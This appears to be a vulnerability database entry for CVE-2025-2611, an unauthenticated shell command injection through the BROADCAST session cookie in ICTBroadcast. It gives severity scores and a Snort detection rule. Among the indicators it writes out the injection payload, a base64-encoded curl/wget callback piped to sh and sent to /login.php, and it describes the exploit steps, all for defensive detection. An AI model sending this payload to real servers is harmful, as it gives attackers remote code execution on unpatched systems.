cbcvebase.
CVE-2025-2611
published 2025-08-05

CVE-2025-2611: The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that…

PriorityP185critical9.3CVSS 4.0
AVNACLATNPRNUINVCHVILVALSCHSIHSAHEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
6.08%
92.5th percentile
The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling. Versions 7.4 and below are known to be vulnerable.

Affected

1 ranges
VendorProductVersion rangeFixed in
ict_innovationsictbroadcast<= 7.4

Detection & IOCsextracted from sources · hover to see the quote

cookieBROADCAST=<payload>
command`echo${IFS}{{base64('curl -s {{interactsh-url}} || wget -qO- {{interactsh-url}}')}}|base64${IFS}-d|sh`
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ICTBroadcast Command Injection (CVE-2025-2611)"; flow:established,to_server; http.cookie; content:"BROADCAST|3d|"; pcre:"/^[^\x3b]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.vulncheck.com/blog/ictbroadcast-kev; reference:cve,2025-2611; classtype:web-application-attack; sid:2065259; rev:1;)
  • Exploit targets GET /login.php with a malicious session cookie value containing shell metacharacters (backtick, pipe, semicolon, dollar sign, newline) in the cookie named by the server-set cookie name (observed as BROADCAST=).
  • Detect shell injection characters in the BROADCAST cookie: semicolons (;/%3B), newlines (\x0a/%0A), backticks (`/%60), pipes (|/%7C), or dollar signs ($/%24) using the Emerging Threats PCRE pattern.
  • Shodan query for exposed ICTBroadcast instances to identify attack surface.
  • The exploit is unauthenticated — no prior session or credentials are required. Exploitation is confirmed by an out-of-band DNS callback (interactsh), so monitor for unexpected DNS/HTTP callbacks from web server processes.
  • The exploit first probes GET /login.php to harvest the server-issued cookie name, then replays the same endpoint with the injected cookie. Two sequential requests to /login.php from the same source with differing cookie values is a strong behavioral signal.
  • ·Versions 7.4 and below are confirmed vulnerable; the exact cookie name harvested from the server may vary, but the ET rule anchors on the 'BROADCAST=' prefix.

CVSS provenance

nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
vendor_redhat5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.